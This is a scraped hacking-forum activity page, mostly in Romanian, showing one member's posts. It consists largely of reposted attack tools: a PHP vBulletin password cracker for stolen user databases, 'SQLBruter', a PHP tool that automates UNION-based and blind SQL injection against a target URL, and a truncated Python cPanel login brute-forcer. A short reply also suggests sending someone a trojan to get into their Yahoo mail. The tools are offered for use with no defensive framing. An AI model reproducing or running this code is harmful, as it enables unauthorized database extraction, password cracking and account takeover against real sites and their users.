Jump to content

Ras

Active Members
 View Profile  See their activity

  • Posts

    1106

  • Joined

  • Last visited

  • Days Won

    1

 Content Type 

Everything posted by Ras

  1. Ras

    Hack Yahoo Mail

    Ras replied to RaXoR's topic in Cosul de gunoi

    incearca si trimite-i un server de trojan care sa nu ii afecteze systemul... si distreaza-te cu el..
  2. Ras
    ############################################################ ## Author: M4k3 ## ## Script-Version: 1.0.2b ## ## Script-Name: vb_tool.php ## ## Copyright: pldsecurity.de / .com /pldsoft.com ## ## ## ## Comment: Next Version coming soon, check ## ## pldsecurity.com for Updates ## ############################################################ # For Crack Option, you need: [vbulletin database] & [wordlist] # For Find Option, you need: [vbulletin database] ###################### Set Error Reporting ################# error_reporting(E_ALL & ~E_NOTICE); set_time_limit(60); # 60 for a database with 1000 Users # 180 for a database with 3000 Users ####################### Change Values ###################### #MySQL Values $mysql[server] = 'localhost:3306'; $mysql[username] = 'root'; $mysql[password] = ''; $mysql[database] = 'vbulletin'; $mysql[table] = 'user'; $mysql[/page][page] = '20'; # Show 20 User / Site on User list #Script Values $script[wordlist] = 'word.txt'; if(!file_exists($script[wordlist])) { $script[crack_option] = false; } $script[version] = '1.0.2b'; ############################################################# ###################### Connection ########################### $mysql[connect] = mysql_connect($mysql[server], $mysql[username], $mysql[password]) or die ("MySQL-Error: " .mysql_error()); $mysql[connect_db] = mysql_select_db($mysql[database], $mysql[connect]) or die ("MySQL-Error: " . mysql_error()); ############################################################# function check_table() { global $mysql; $query = mysql_query("Select * from ".$mysql[table]."") or die ("MySQL-Error: " . mysql_error()); if(!mysql_error()) { return 1; } } function find_password($_POST) { global $mysql; $query = mysql_query("Select * from ".$mysql[table]."") or die ("MySQL-Error: " . mysql_error()); while($user = mysql_fetch_array($query)) { $script[get_salt] .= $user[salt].htmlentities('<r>'); } $script[salt] = explode(htmlentities('<r>'), $script[get_salt]); $query = mysql_query("Select * from ".$mysql[table]."") or die ("MySQL-Error: " . mysql_error()); while($user = mysql_fetch_array($query)) { for($i=0;$i<=sizeof($script[salt]);$i++) { if(md5(md5(rtrim($_POST['password'])).$script[salt][$i]) == $user[password]) { print 'Password found! Username: '.$user[username].' Userid: '.$user[userid].' '; flush(); } } } } function crack_password($_POST) { global $script; global $mysql; $query = mysql_query("Select * from ".$mysql[table]." where username = '".addslashes($_POST['username'])."'") or die ("MySQL-Error: " . mysql_error()); $user = mysql_fetch_array($query); if(!is_array($user)) { print 'The User with the name [b]'.addslashes($_POST['username']).'[/b] doesn\'t exist. <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>'; } else { $file = fopen($script[wordlist], 'r'); while(!feof($file)) { $word = fgets($file, 4096); if(md5(md5(rtrim($word)).$user[salt]) == $user[password]) { print 'Password Cracked! Password is [b]'.$word.'[/b]'; $cracked = true; } } if($cracked == false) { print 'Failed to Crack Password.'; } fclose($file); } } if(check_table() == 1) { print '<html> <head> <title>VBulletin Password Cracker</title> <style type = "text/css"> body { font-size: 11px; text-align: center; } .option_table { font-size: 11px; border: 1px #000000 solid; width: 300px; } .main_table { font-size: 11px; border: 1px #000000 solid; width: 350px; } .user_table { font-size: 11px; text-align: center; border: 0px #000000 solid; } .show_user { border: 1px #000000 solid; width: 125px; } .input_text { font-size: 11px; } .input_submit { color: #ffffff; font-size: 11px; border: 1px #000000 solid; background-color: #000000; } a:link { color: #000000; text-decoration: none; } a:hover { color: #000000; text-decoration: underline overline; } </style> </head> <body>'; if(empty($_GET['crack_option']) && empty($_GET['find_option'])) { print '<form method = "get"> <table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "option_table"> <tr> <td colspan = "2" align = "center"> [b]vbulletin password cracker & finder '.$script[version].'[/b] <hr size = "1" style = "border: 1px #000000 solid;" </td> </tr> <tr> <td>'; if($script[crack_option] !== false) { print '<input type = "checkbox" name = "crack_option">'; } else { print '<input type = "checkbox" name = "crack_option" disabled>'; } print '</td> <td> Use "Crack Password" Option </td> </tr> <tr> <td> <input type = "checkbox" name = "find_option"> </td> <td> Use "Find Password" Option </td> </tr> <tr> <td colspan = "2" align = "center"> <hr size = "1" style = "border: 1px #000000 solid;" <input type = "submit" value = "Run Option" class = "input_submit"> </td> </tr> <tr> <td colspan = "2" align = "center"> © Copyright by M4k3 <a href = "http://pldsecurity.com">PLDsecurity.com</a> </td> </tr> </table> </form>'; } if($_GET['crack_option'] == 'on') { if($_GET['do'] == 'show_user') { print '<table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "user_table"> <tr> <td colspan = "2" class = "show_user"> Please select a username. </td> </tr> <tr> <td class = "show_user"> Userid </td> <td class = "show_user"> Username </td> </tr>'; if(empty($_GET['start']) && empty($_GET['end'])) { $query = mysql_query("Select userid, username from ".$mysql[table]." limit 0, ".$mysql[/page][page]."") or die ("MySQL-Error: " . mysql_error()); while($show_user = mysql_fetch_array($query)) { print '<tr> <td class = "show_user"> '.$show_user[userid].' </td> <td class = "show_user"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=get_user&username='.$show_user[username].'"> '.$show_user[username].'</a> </td> </tr>'; } print '<tr> <td colspan = "2" align = "right" class = "show_user"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$mysql[/page][page].'&end='.$mysql[/page][page].'"> Next Page >></a> </td> </tr> </table> '; print '<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>'; } else { $query = mysql_query("Select userid, username from ".$mysql[table]." limit ".addslashes($_GET['start']).",".addslashes($_GET['end'])."") or die ("MySQL-Error: " . mysql_error()); while($show_user = mysql_fetch_array($query)) { print '<tr> <td class = "show_user"> '.$show_user[userid].' </td> <td class = "show_user"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=get_user&username='.$show_user[username].'"> '.$show_user[username].'</a> </td> </tr>'; } $page[next] = $_GET['start'] + $mysql[/page][page]; $page[previous] = $_GET['start'] - $mysql[/page][page]; $query = mysql_query("Select count(*) from user") or die ("MySQL-Error: " . mysql_error()); $mysql[table_count] = mysql_fetch_array($query); if($page[previous] < 0) { print '<tr> <td colspan = "2" align = "right" class = "show_user"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[next].'&end='.$mysql[/page][page].'"> Next Page >></a> </td> </tr> </table> '; } elseif($page[next] > $mysql[table_count][0]) { print '<tr> <td colspan = "2" align = "left" class = "show_user"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[previous].'&end='.$mysql[/page][page].'"> << Previous Page</a> </td> </tr> </table> '; } else { print '<tr> <td align = "left" class = "show_user"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[previous].'&end='.$mysql[/page][page].'"> << Previous Page</a> </td> <td align = "right" class = "show_user"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[next].'&end='.$mysql[/page][page].'"> Next Page >></a> </td> </tr> </table> '; } print '<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>'; } } elseif($_GET['do'] == 'crack_password' && !empty($_POST['username'])) { crack_password($_POST); } else { print '<form action = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=crack_password" method = "post"> <table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "main_table"> <tr> <td colspan = "2" align = "center"> Insert a username or use the function "show user list" <hr size = "1" style = "border: 1px #000000 solid;"> </td> </tr> <tr> <td> Username: </td> <td>'; if($_GET['do'] == 'get_user' && !empty($_GET['username'])) { print '<input type = "text" name = "username" value = "'.$_GET['username'].'" size = "30" class = "input_text">'; } else { print '<input type = "text" name = "username" size = "30" class = "input_text">'; } print '</td> </tr> <tr> <td colspan = "2" align = "center"> <input type = "submit" value = "Crack Password" class = "input_submit"> </td> </tr> <tr> <td colspan = "2" align = "center"> <hr size = "1" style = "border: 1px #000000 solid;"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user">show user list</a> </td> </tr> </table> </form> <a href = "'.$_SERVER[PHP_SELF].'">Back to Script Index</a>'; } } elseif($_GET['find_option'] == 'on') { if($_GET['do'] == 'find_password' && !empty($_POST['password'])) { print 'Searching... '; flush(); find_password($_POST); } else { print '<form action = "'.$_SERVER[PHP_SELF].'?find_option=on&do=find_password" method = "post"> <table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "main_table"> <tr> <td colspan = "2" align = "center"> Please insert a password. <hr size = "1" style = "border: 1px #000000 solid;"> </td> </tr> <tr> <td> Password: </td> <td> <input type = "text" name = "password" size = "30" class = "input_text"> </td> </tr> <tr> <td colspan = "2" align = "center"> <input type = "submit" value = "Find Password" class = "input_submit"> </td> </tr> </table> </form> <a href = "'.$_SERVER[PHP_SELF].'">Back to Script Index</a>'; } } print ' </body> </html>'; } ?><? # For Crack Option, you need: [vbulletin database] & [wordlist] # For Find Option, you need: [vbulletin database]
  3. Ras
    Merci pt explicatie
  4. Ras

    SQL-Bruter v1.2

    Ras posted a topic in Programare

    <? ############################################### # SQLBruter v1.2 # # (c)oded by Raz0r # # ICQ 502210 # # Greets to InAttack # ############################################### error_reporting(7); set_magic_quotes_runtime(0); @set_time_limit(0); @ini_set("max_execution_time",0); @ini_set("output_buffering",0); @ini_set("default_socket_timeout",5); if (function_exists("ob_start")) ob_start('ob_tidyhandler'); $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\'; $self=basename($HTTP_SERVER_VARS['PHP_SELF']); echo "<html> <head><title>::SQLBruter 1.2 (coded by Raz0r)::</title> <style> Body { ; Font-Family: Arial; ; Font-size: 14px; } INPUT.speed { ; Font-Family: Arial; ; Font-size: 14px; ; Border-style: none; ; BackGround-color: transparent; } TABLE { ; Font-Family: Arial; ; Font-size: 14px; } TD.strconv { ; Font-Family: Verdana; ; Font-size: 4px; } DIV.copyright { ; Font-Family: Arial; ; Font-size: 12px; ; color: SILVER; } </style> </head>"; if ((!isset($_POST['submit'])) && (!isset($_GET['encode']))) { die (" <body onLoad=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'none';\"> <Font Face=\"arial\"> <Center> <H1><Font color=#DDDDDD>SQLBruter 1.2</font></H1> <Form Method=\"Post\"> <Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD> <Tr> <Td> <Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef> <Tr> <Td> <table><tr><td width=100>URL</td> <td><Input Type=\"text\" Name=\"url_post\" Value=\"http://\" SIZE=40></td></table> <table><tr><td width=100>String</td> <td><Input Type=\"text\" Name=\"string_post\" SIZE=40></td></table> <table><tr><td width=100>log file</td> <td><Input Type=\"text\" Name=\"log_post\" Value=\"log.txt\" SIZE=40></td></table> <table><tr><td width=100>proxy</td><td><Input Type=\"text\" Name=\"proxy_post\" SIZE=40></td></table> <table><tr><td valign=top width=100>mode</td><td> <Input Type=\"radio\" Name=\"mode_post\" Value=\"1\" onClick=\"document.getElementById('1').style.display = 'block'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'none';\">Number of selected rows bruteforce <Input Type=\"radio\" Name=\"mode_post\" Value=\"2\" onClick=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'block'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'none';\">Names of tables bruteforce <Input Type=\"radio\" Name=\"mode_post\" Value=\"3\" onClick=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'block'; document.getElementById('4').style.display = 'none';\">Names of columns bruteforce <Input Type=\"radio\" Name=\"mode_post\" Value=\"4\" onClick=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'block';\">Character-oriented bruteforce</td></table> <div id=\"1\"><table><tr><td width=200>max number of rows to brute</td> <td valign=top> <Input Type=\"text\" Name=\"max_post\" Value=\"20\" SIZE=2></td></table> <table><tr><td width=200>get columns which can output information</td> <td valign=top> <Input Type=\"checkbox\" Name=\"getcols_post\" checked></td></table></div> <div id=\"2\"><table><tr><td width=200>number of the selected rows</td> <td valign=top> <Input Type=\"text\" Name=\"rows1_post\" Value=\"15\" SIZE=2></td></table><table><tr><td width=200>path to the dictionary file</td><td> <Input Type=\"text\" Name=\"dic1_post\" Value=\"dic.txt\" SIZE=20></td></tr><table><tr><td width=200>prefix</td><td> <Input Type=\"text\" Name=\"pref_post\" SIZE=20></td></tr></table></div> <div id=\"3\"><table><tr><td width=200>number of the selected rows</td> <td valign=top> <Input Type=\"text\" Name=\"rows2_post\" Value=\"15\" SIZE=2></td></table><table><tr><td width=200>path to the dictionary file</td><td> <Input Type=\"text\" Name=\"dic2_post\" Value=\"dic.txt\" SIZE=20></td></tr><table><tr><td width=200>name of the table to brute</td><td> <Input Type=\"text\" Name=\"table_post\" SIZE=20></td></tr></table></div> <div id=\"4\"><table title=\"e.g. user(), version(), etc\"><tr><td width=200>DB query</td> <td valign=top> <Input Type=\"text\" Name=\"query_post\" Value=\"user()\" SIZE=20></td></table><table><tr><td width=200>use specific range of chars</td><td> <Input Type=\"text\" Name=\"ot_post\" Value=\"97\" SIZE=3><Input Type=\"text\" Name=\"do_post\" Value=\"122\" SIZE=3></td></tr></table></div> </Td> </Tr> </Table> </Td> </Tr> </Table> <A Href=\"$self?encode\">String converter</A> <Input Type=\"submit\" Value=\"GO!\" name=\"submit\"> <Div class=copyright>[B]Raz0r[/B] 2007 ©</Div></Center> </body> </html>" ); } elseif (isset($_GET['encode'])) { $strconv = $_POST['strconv_post']; $len = strlen($strconv); echo "<body> <Center> <H1><Font color=#DDDDDD>SQLBruter 1.2</font></H1> <Form Method=\"Post\"> <Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=90%> <Tr> <Td> <Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%> <Tr> <Td> <table><tr><td width=100%> <Input Type=\"text\" Name=\"strconv_post\" Value=\"";if (!empty($strconv))echo $strconv; else echo "enter text here"; echo "\"> <Input Type=\"submit\" name=\"submit_encode\" Value=\"Encode\"> </td></tr></table>"; for ($i = 0; $i < $len; $i++) { $substring = substr($strconv,$i,1); $ascii_code = ord($substring); if ($i == ($len - 1)) $res .= $ascii_code; else $res .= $ascii_code.","; } if (($len > 0) && (isset($_POST['submit_encode']))) $ascii = "CHAR(".$res.")"; else $ascii = null; if (($len > 0) && (isset($_POST['submit_encode']))) $hex = "0x".bin2hex($strconv); else $hex = null; if(isset($_POST['submit_encode'])) $base64 = base64_encode($strconv); if(isset($_POST['submit_encode']))$md5= md5($strconv); if(isset($_POST['submit_encode']))$sha1 = sha1($strconv); echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=90%> <Tr> <Td> <Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%> <Tr><Td> <table><tr><td width=200>ASCII (SQL syntax)</td> <td><TextArea Name=result1 Cols=\"100\" Rows=\"2\">$ascii</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result1.select();result1.focus()></Td></table> <table><tr><td width=200>HEX</td> <td><TextArea Name=result2 Cols=\"100\" Rows=\"2\">$hex</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result2.select();result2.focus()></Td></table> <table><tr><td width=200>BASE64</td> <td><TextArea Name=result3 Cols=\"100\" Rows=\"2\">$base64</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result3.select();result3.focus()></Td></table> <table><tr><td width=200>MD5</td> <td><TextArea Name=result4 Cols=\"100\" Rows=\"2\">$md5</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result4.select();result4.focus()></Td></table> <table><tr><td width=200>SHA1</td> <td><TextArea Name=result5 Cols=\"100\" Rows=\"2\">$sha1</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result5.select();result5.focus()></Td></table> </Td> </Td> </Tr> </Table> </Td> </Tr> </Table></Td> </Tr> </Table></Td> </Tr> </Table><Div class=copyright> [B]Raz0r[/B] 2007 ©</Div></Center></body></html>"; die; } if (!empty($_POST['url_post'])) $url = $_POST['url_post']; else die("NO URL"); if (!empty($_POST['string_post'])) $string = $_POST['string_post']; else die("NO STRING"); if (!empty($_POST['mode_post'])) $mode = $_POST['mode_post']; else die("NO MODE"); if (!empty($_POST['log_post'])) $log = $_POST['log_post']; if (!empty($_POST['proxy_post']))$proxy = $_POST['proxy_post']; $c = preg_match($proxy_regex,$proxy); if (!$c) die("NOT A VALID PROXY"); $conn = @parse_url($url); $host = $conn["host"]; $path = $conn["path"]; $param = $conn["query"]; if (isset($conn["port"])) $port = $conn["port"]; else $port=80; switch ($mode) { case 1: if (!empty($_POST['max_post'])) $max = $_POST['max_post']; else die("NO MAX NUMBER OF ROWS"); if (!empty($_POST['getcols_post'])) $getcols = $_POST['getcols_post']; if ($getcols == "on") $getcols = 1; else $getcols = 0; show_params(); mode1($url, $string, $max, $getcols); break; case 2: if (!empty($_POST['rows1_post'])) $rows = $_POST['rows1_post']; else die("NO ROWS"); if (!empty($_POST['dic1_post'])) $dic = $_POST['dic1_post']; else die("NO DICTIONARY"); if (!empty($_POST['pref_post'])) $pref = $_POST['pref_post']; show_params(); brute($url, $string, $rows, $dic, FALSE); break; case 3: if (!empty($_POST['rows2_post'])) $rows = $_POST['rows2_post']; else die("NO ROWS"); if (!empty($_POST['dic2_post'])) $dic = $_POST['dic2_post']; else die("NO DICTIONARY"); if (!empty($_POST['table_post'])) $table = $_POST['table_post']; else die("NO TABLE"); show_params(); brute($url, $string, $rows, $dic, $table); break; case 4: if (!empty($_POST['query_post'])) $query = $_POST['query_post']; else die("NO QUERY"); if (!empty($_POST['ot_post'])) $ot = $_POST['ot_post']; else $ot = 97; if (!empty($_POST['do_post'])) $do = $_POST['do_post']; else $do = 122; show_params(); mode4($url, $string, $query, $ot, $do); break; } function mode_name($mode) { $modes = array("Number of selected rows bruteforce", "Names of tables bruteforce", "Names of columns bruteforce", "Character-oriented bruteforce"); return $modes[$mode-1]; } function show_params() { global $url, $string, $mode, $log, $proxy, $max, $rows, $dic, $pref, $table, $query, $ot, $do; $mode_name = mode_name($mode); echo " <body> <script> <!-- var ie=document.all?1:0; var ns=document.getElementById&&!document.all?1:0; function InsertText(text) { if(ie) { document.all.text.value=text; } else if(ns) { document.forms['speed'].elements['text'].value=text; } else alert(\"Your browser is NOT supported\"); } --> </script> <Font Face=\"arial\"> <Center> <H1><Font color=#DDDDDD>SQLBruter 1.2</font></H1> <Table CellSpacing=\"0\" CellPadding=\"0\" width=90%> <Tr> <Td> <Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%> <Tr> <Td> <Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%> <Tr> <Td> <table><tr><td width=150>[B]URL[/B]</td> <td>".htmlspecialchars($url)."</td></table> <table><tr><td width=150>[B]String[/B]</td> <td>".htmlspecialchars($string)."</td></table> <table><tr><td width=150>[B]Mode[/B]</td><td>".htmlspecialchars($mode_name)."</td></table> "; if (isset($log)) echo "<table><tr><td width=150>[B]Log file[/B]</td> <td>".htmlspecialchars($log)."</td></table>"; if (isset($proxy)) echo "<table><tr><td width=150>[B]Proxy[/B]</td> <td>".htmlspecialchars($proxy)."</td></table>"; switch ($mode) { case 1: echo "<table><tr><td width=150>[B]Rows max number[/B]</td> <td>".htmlspecialchars($max)."</td></table>"; break; case 2: echo "<table><tr><td width=150>[B]Number of the selected rows[/B]</td> <td>".htmlspecialchars($rows)."</td></table>"; echo "<table><tr><td width=150>[B]Dictionary[/B]</td> <td>".htmlspecialchars($dic)." (".checkdic($dic)." words)</td></table>"; if (isset($pref)) echo "<table><tr><td width=150>[B]Prefix[/B]</td> <td>".htmlspecialchars($pref)."</td></table>"; break; case 3: echo "<table><tr><td width=150>[B]Number of the selected rows[/B]</td> <td>".htmlspecialchars($rows)."</td></table>"; echo "<table><tr><td width=150>[B]Dictionary[/B]</td> <td>".htmlspecialchars($dic)." (".checkdic($dic)." words)</td></table>"; echo "<table><tr><td width=150>[B]Table[/B]</td> <td>".htmlspecialchars($table)."</td></table>"; break; case 4: echo "<table><tr><td width=150>[B]Query[/B]</td> <td>".htmlspecialchars($query)."</td></table>"; echo "<table><tr><td width=150>[B]From[/B]</td> <td>".htmlspecialchars($ot)."</td></table>"; echo "<table><tr><td width=150>[B]To[/B]</td> <td>".htmlspecialchars($do)."</td></table>"; break; } echo "</Td></Tr></Table></Td></Tr></Table> "; flush(); } function sendpacket($packet) { global $host, $port, $proxy; if (empty($proxy)) { $ock = @fsockopen(@gethostbyname($host),$port); stream_set_blocking($ock, 0); stream_set_timeout($ock,600); if (!$ock) { echo "No response from ".$host.":80 "; } else { fputs($ock, $packet); $html=""; while (!feof($ock)) { $html.=fgets($ock); } } } else { $parts=explode(":",$proxy); $ock2=@fsockopen($parts[0],$parts[1]); if (!$ock2) { echo "No response from proxy ($proxy)"; } else { fputs($ock2,$packet); $html=""; while ((!feof($ock2)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock2,1); } } } return $html; } function savelogfile($logfile, $mode, $text) { if (!is_file($logfile)) { $s = @fopen($logfile,"w"); fclose($s); chmod($logfile,0777); } $fp = @fopen($logfile,"a"); fputs($fp, "*** SQLBruter's report [".date(" l dS 0f F Y h:i:s A ")."] ***\r\n"); fputs($fp, "[~] ".mode_name($mode)."\r\n".$text."\r\n"); fputs($fp, "____________________________________________________________________\r\n"); fclose($fp); } function checkdic($dic) { $handle = @fopen($dic, "r"); if ($handle) { while (!feof($handle)) { $buffer = fgets($handle, 4096); $x++; } fclose($handle); } else die("INVALID DICTIONARY"); return $x; } function mode1($url, $string, $max, $getcols) { global $log, $proxy, $host, $path, $param; echo "<Form name=\"speed\"><Input Type=\"text\" Name=\"text\" Value=\"Please wait...\" size=100 class=speed DISABLED=yes></Form>"; flush(); for ($i = 0; $i < $max; $i++) { if ($i > 0) $null .=",0"; else $null = "0"; $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null."/* HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $content = sendpacket($packet); if (strpos($content, $string)>0) { if ($getcols == 1) { for ($z = 1; $z <= ($i+1); $z++) { if ($z > 1) $razor .=",0x72617a3072".bin2hex($z); else $razor = "0x72617a3072".bin2hex($z); } $temp = explode("=", $param); $temp[(sizeof($temp)-1)] = "-1"; $param = implode("=", $temp); $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$razor."/* HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $content = sendpacket($packet); for ($y = 1; $y <= ($i+1); $y++) { if (strpos($content, ("raz0r".$y)) > 0) $visiblecols[] .= $y; } if (!is_array($visiblecols)) {$nocols = 1;} } echo "<script>InsertText('Done!');</script>"; echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>Number of rows is ".($i+1)." "; if (($getcols == 1) && ($nocols != 1)) {$result = $url." UNION SELECT ".$null."/* Columns ".@implode(",", $visiblecols)." can output information";} elseif ($nocols == 1) $result = $url." UNION SELECT ".$null."/* No columns which can output information"; else $result = $url." UNION SELECT ".$null."/*"; echo $result; echo "</Td></Tr></Table></Td></Tr></Table></Td></Tr></Table></body></html>"; flush(); if (isset($log)) {$result = str_replace(" ", "\r\n", $result); savelogfile($log, 1, $result);} die; } } echo "<script>InsertText('Failed! Try to increase max number of selected rows');</script>"; flush(); } function brute($url, $string, $rows, $dic, $table) { global $log, $proxy, $pref, $host, $path, $param; $x = checkdic($dic); echo "<Form name=\"speed\"><Input Type=\"text\" Name=\"text\" Value=\"\" size=100 class=speed DISABLED=yes></Form>"; flush(); $handle = @fopen($dic, "r"); if ($handle) { $begin_time = time(); if ($table === FALSE) { for ($i = 0; $i < $rows; $i++) { if ($i > 0) $null .=",0"; else $null = "0"; } } else { for ($i = 0; $i < ($rows-1); $i++) { if ($i > 0) $null .=",0"; else $null = "0"; } } for ($i = 0; $i < $x; $i++) { $word = fgets($handle, 4096); $word = ereg_replace("\n", "", $word); $word = ereg_replace("\r", "", $word); $word = trim($word); if (isset($pref)) $word = $pref."_".$word; if (($word !== "") & (!is_numeric($word)) & (!strpos($word,"-")) & (!strpos($word, " "))) { if ($table === FALSE) $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null."%20FROM%20".urlencode($word)."/* HTTP/1.1\r\n"; else $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null.",".urlencode($word)."%20FROM%20".$table."/* HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $content = sendpacket($packet); $z++; $r++; if ($begin_time + 1 == time()) { $begin_time += 1; $percent = round($z/$x * 100); $words_per_second = $r; $r = 0; echo "<script>InsertText('Completed - ".$percent."%\tCurrent speed - ".$words_per_second." words per second');</script>"; flush(); } elseif ($begin_time + 1 < time()) { $begin_time = time() + 1; $percent = round($z/$x * 100); $words_per_second = $r; $r = 0; echo "<script>InsertText('Completed - ".$percent."%\tCurrent speed - ".$words_per_second." words per second');</script>"; flush(); } if (strpos($content, $string)>0) { if ($table === FALSE) { $result = $url." UNION SELECT ".$null." FROM ".$word."/*"; echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>Table was found - $word $result</Td></Tr></Table></Td></Tr></Table> "; } else { $result = $url." UNION SELECT ".$null.",".$word." FROM ".$table."/*"; echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>Column was found - $word $result</Td></Tr></Table></Td></Tr></Table> "; } flush(); if (isset($log)) { if ($table === FALSE) savelogfile($log, 2, $result); else savelogfile($log, 3, $result); } } } } } } function found($min, $max, $sp, $result) { if (($max-$min)<5) crack($min,$max, $sp, $result); $r = round($max - ($max-$min)/2); $check = ">$r"; if ( check($check, $sp, $result)) { if (!empty($result)) $status = "(".$result.")"; print "<script>InsertText('Now checking > $r $status');</script>"; flush(); found($r,$max, $sp, $result); } else { if (!empty($result)) $status = "(".$result.")"; print "<script>InsertText('Now checking < $r $status');</script>"; flush(); found($min,$r+1, $sp, $result); } } function crack($cmin, $cmax, $sp, $result) { global $ot, $do, $output, $query; $i = $cmin; $check1 = ">0"; if (check($check1, $sp, $result)) { while ($i<=$cmax) { $check = "=$i"; if (!empty($result)) $status = "(".$result.")"; echo "<script>InsertText('Now checking $check $status');</script>"; flush(); if (check($check, $sp, $result)) { $result .= chr($i); $sp++; if (!isset($ot) || !isset($do)) { $ot = 97; $do = 122; } found($ot, $do, $sp, $result); } $i++; } if (((empty($result)) && ($sp == 2)) or (empty($result))) { echo "<script>InsertText('Failed!');</script>"; flush(); die; } else { if (isset($output)) save_result("\n Query ".$query." - ".$result."\n"); echo "<script>InsertText('Not full result ($result). Try to increase the range of chars.');</script>"; flush(); die("</tr></td></table></body></html>"); } } if (((empty($result)) && ($sp == 2)) or (empty($result))) { echo "<script>InsertText('Failed!');</script>"; flush(); die; } else die("<script>InsertText('Done!');</script><Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>[b]$query[/b] - $result</Td></Tr></Table></Td></Tr></Table></body></html>"); } function check($check, $sp, $result) { global $path, $host, $param, $query, $string; $packet = "GET ".$path."?".$param."%20AND%20ascii(lower(substring(".urlencode($query).",".$sp.",1)))".$check." HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $html = sendpacket($packet); if (strpos($html,$string) > 0) return 1; return 0; } function mode4($url, $string, $query, $ot, $do) { global $log, $proxy, $host, $path, $param; echo "<Form name=\"speed\"><Input Type=\"text\" Name=\"text\" Value=\"\" size=100 class=speed DISABLED=yes></Form>"; flush(); found($ot, $do, 1, ""); } if (($mode_post == 2) || ($mode_post == 3) ) echo "<script>InsertText('Completed - 100%');</script>"; echo "</Td></Tr></Table></body></html>"; flush(); ?>
  5. Ras
    #!usr/bin/python import threading, time, random, sys, urllib2, httplib, base64 from copy import copy def title(): print "\n\t d3hydr8[at]gmail[dot]com cPanel BruteForcer v1.0" print "\t-----------------------------------------------------\n" def timer(): now = time.localtime(time.time()) return time.asctime(now) if len(sys.argv) !=5: title() print "\nUsage: ./cPanelbrute.py <server> <port> <userlist> <wordlist>\n" print "ex: python cPanelbrute.py example.com 2082 users.txt wordlist.txt\n" sys.exit(1) try: users = open(sys.argv[3], "r").readlines() except(IOError): print "Error: Check your userlist path\n" sys.exit(1) try: words = open(sys.argv[4], "r").readlines() except(IOError): print "Error: Check your wordlist path\n" sys.exit(1) wordlist = copy(words) def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != 0: value = random.sample(words, 1) words.remove(value[0]) else: print "\nReloading Wordlist - Changing User\n" reloader() value = random.sample(words, 1) users.remove(users[0]) lock.release() if len(users) ==1: return users[0], 